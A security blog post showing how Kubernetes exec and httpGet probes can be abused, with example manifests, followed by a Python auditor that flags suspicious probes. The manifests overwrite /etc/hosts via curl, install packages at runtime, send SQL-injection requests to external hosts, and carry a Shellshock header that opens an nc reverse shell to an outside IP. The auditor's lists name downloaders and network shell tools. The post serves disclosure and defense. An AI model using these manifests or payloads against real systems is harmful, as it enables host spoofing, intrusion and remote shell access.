Exploiting applications using liveness probes in Kubernetes

Introduction

Startup, readiness, and liveness probes are well described in the Kubernetes documentation. The kubelet uses the probes defined in the pod manifest to verify whether a pod is still booting, ready to accept traffic, and still alive. It is the kubelet that actually executes the probes, not the pod itself: an exec probe is a command run inside the container on the kubelet's behalf, and an httpGet probe is an HTTP request that the kubelet itself sends from the node.

There are different ways the probes can be executed; the two used in this post are:

  • httpGet
  • exec

The problems described here are considered 'as designed', since, according to the reviewers, you should only download containers from a trusted source.

The examples below show that trusted sources of container images will not solve the problem, and neither will image scanning: the misbehaviour is defined in the pod manifest, not in the image.

To prevent such an attack, it is mandatory to rigorously scan the Kubernetes pod and deployment manifests before deploying (and not to use any pre-canned examples :-))

Example 1: Overwriting files on the pod filesystem

This example overwrites the pod's /etc/hosts file to spoof hostnames: every five seconds the liveness probe runs curl inside the container and writes the downloaded file over /etc/hosts.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
        - curl
        - www.xxxxx.com/host.txt
        - -o
        - /etc/hosts
      initialDelaySeconds: 5
      periodSeconds: 5
EOF

Example 2: Installing applications in a pod at deployment time

This example uses the stock ubuntu image: the readiness probe runs apt-get update and the liveness probe installs curl, so the software ends up in the pod without ever being part of the image.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF

Example 3: Attacking http(s) endpoints using SQL injection, XSS, …

Here the httpGet probe is pointed at an external host and the path carries a SQL injection payload; because the kubelet sends the request, it originates from the node rather than from the pod.

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
        - name: User-Agent
          value: xxxxxxxxx
EOF

Example 4: Attacking http(s) endpoints using Shellshock

The same httpGet mechanism, this time with a Shellshock payload placed in a custom HTTP header next to the SQL injection in the path.

apiVersion: v1
kind: Pod
metadata:
  name: radarhack-pod3
  labels:
    pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
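The introduction asks for manifests to be scanned rigorously before deployment. The following is an added example of such a check, not code from the original post or its author: it walks a pod (or a Deployment/StatefulSet/DaemonSet/Job template, or a kubectl List) and reports probes that match the four patterns shown above, namely exec probes that run downloaders, package managers or shells, exec arguments touching sensitive paths, httpGet probes with an external host, and paths or headers carrying injection payloads or a Shellshock-style function definition. It reads the JSON form of a manifest, which `kubectl apply --dry-run=client -o json -f pod.yaml` or `kubectl get pod <name> -o json` produces, so it needs only the standard library. The tool lists, the sensitive-path prefixes and the two sample manifests are constructed assumptions for this example and should be tuned per environment.

```python
"""Audit Kubernetes pod manifests for probes that do more than check health.

Added example, not code from the original post. Input is a parsed manifest
dict (JSON from `kubectl apply --dry-run=client -o json -f pod.yaml` or
`kubectl get pod <name> -o json`). The sample manifests below are constructed.
"""
import json
import os
import re
import sys

PROBE_KINDS = ("startupProbe", "readinessProbe", "livenessProbe")
WORKLOADS = {"Deployment", "StatefulSet", "DaemonSet", "Job", "ReplicaSet"}

# Programs a health check has no business running (assumption: tune per site).
DOWNLOADERS = {"curl", "wget"}
PACKAGE_MANAGERS = {"apt", "apt-get", "apk", "yum", "dnf", "pip", "pip3"}
SHELLS_AND_NET = {"sh", "bash", "dash", "nc", "ncat", "netcat", "socat"}

# Paths a probe should never write to or touch; matched against each argument.
SENSITIVE_PREFIXES = ("/etc/", "/usr/", "/bin/", "/sbin/", "/root/", "/var/lib/")

# Characters that signal injection in an HTTP path or header value, and the
# function-definition prefix that characterises a Shellshock-style header.
INJECTION_CHARS = re.compile(r"""['"<>;|`$(){}\\]|--""")
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\)\s*\{")


def _check_exec(where, exec_spec):
    findings = []
    cmd = [str(a) for a in exec_spec.get("command") or []]
    if not cmd:
        return findings
    prog = os.path.basename(cmd[0])
    if prog in DOWNLOADERS:
        findings.append(f"{where}.exec: runs downloader '{prog}'")
    elif prog in PACKAGE_MANAGERS:
        findings.append(f"{where}.exec: runs package manager '{prog}'")
    elif prog in SHELLS_AND_NET:
        findings.append(f"{where}.exec: runs shell/network tool '{prog}'")
    for arg in cmd[1:]:
        if arg.startswith(SENSITIVE_PREFIXES):
            findings.append(f"{where}.exec: references sensitive path '{arg}'")
    return findings


def _check_http(where, http_spec):
    findings = []
    host = http_spec.get("host")
    if host:  # a probe should hit the pod's own IP, never a third party
        findings.append(f"{where}.httpGet: targets external host '{host}'")
    path = str(http_spec.get("path", ""))
    if INJECTION_CHARS.search(path):
        findings.append(f"{where}.httpGet: path contains injection characters {path!r}")
    for hdr in http_spec.get("httpHeaders") or []:
        name, value = hdr.get("name", ""), str(hdr.get("value", ""))
        if SHELLSHOCK_PREFIX.search(value):
            findings.append(f"{where}.httpGet: header '{name}' is a Shellshock-style function definition")
        elif INJECTION_CHARS.search(value):
            findings.append(f"{where}.httpGet: header '{name}' contains injection characters {value!r}")
    return findings


def audit_probes(pod):
    """Return the findings for one Pod (or pod template); empty means nothing flagged."""
    findings = []
    spec = pod.get("spec") or {}
    for field in ("initContainers", "containers"):
        for i, c in enumerate(spec.get(field) or []):
            for kind in PROBE_KINDS:
                probe = c.get(kind)
                if not probe:
                    continue
                where = f"{field}[{i}]({c.get('name', '?')}).{kind}"
                if "exec" in probe:
                    findings += _check_exec(where, probe["exec"])
                if "httpGet" in probe:
                    findings += _check_http(where, probe["httpGet"])
    return findings


def audit_manifest(doc):
    """Accept a Pod, a workload with a pod template, or a kubectl List."""
    items = doc.get("items") or [] if doc.get("kind") == "List" else [doc]
    findings = []
    for item in items:
        if item.get("kind") == "Pod":
            findings += audit_probes(item)
        elif item.get("kind") in WORKLOADS:
            findings += audit_probes((item.get("spec") or {}).get("template") or {})
    return findings


# Constructed manifest modelled on the post's examples (not the post's text).
SUSPICIOUS_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "probe-abuse"}, "spec": {"containers": [
    {"name": "app", "image": "ubuntu",
     "readinessProbe": {"exec": {"command": ["apt-get", "update"]}},
     "livenessProbe": {"exec": {"command": ["curl", "example.invalid/host.txt", "-o", "/etc/hosts"]}}},
    {"name": "web", "image": "nginx",
     "livenessProbe": {"httpGet": {"host": "www.example.invalid", "path": "/?'OR 1=1--", "port": 8080,
                                   "httpHeaders": [{"name": "X-Frame-Options", "value": "() { :;}; echo"}]}}},
]}}

# Constructed manifest with benign probes: own port, no host, read-only exec.
CLEAN_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "probe-ok"}, "spec": {"containers": [
    {"name": "web", "image": "nginx",
     "livenessProbe": {"httpGet": {"path": "/healthz", "port": 80}},
     "readinessProbe": {"exec": {"command": ["cat", "/tmp/healthy"]}}},
]}}


def main(argv):
    """Usage: python check_probes.py pod.json; exits 1 when anything is flagged."""
    if len(argv) > 1:
        with open(argv[1]) as fh:
            doc = json.load(fh)
    else:
        doc = SUSPICIOUS_POD  # demo run on the constructed manifest
    results = audit_manifest(doc)
    for line in results:
        print("FINDING:", line)
    return 1 if results else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run without arguments it audits the constructed manifest and reports six findings (the package manager, the downloader, the write to /etc/hosts, the external host, the injected path and the Shellshock header); the clean manifest produces none. A non-zero exit code makes the script usable as a gate in a CI step before kubectl apply. The lists are deliberately short so the output is a triage list, not a verdict: a `sh -c` probe can be legitimate, but it deserves a look.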

Conclusion

Much has been written on securely deploying applications on Kubernetes. Keep in mind that every aspect needs full attention, and that generating and building Kubernetes manifests is also developing code.

Philippe Bogaerts

#BruCON co-founder, #OWASP supporter, Application Delivery and Web Application Security, #Kubernetes and #container, #pentesting enthousiast, BBQ & cocktails !!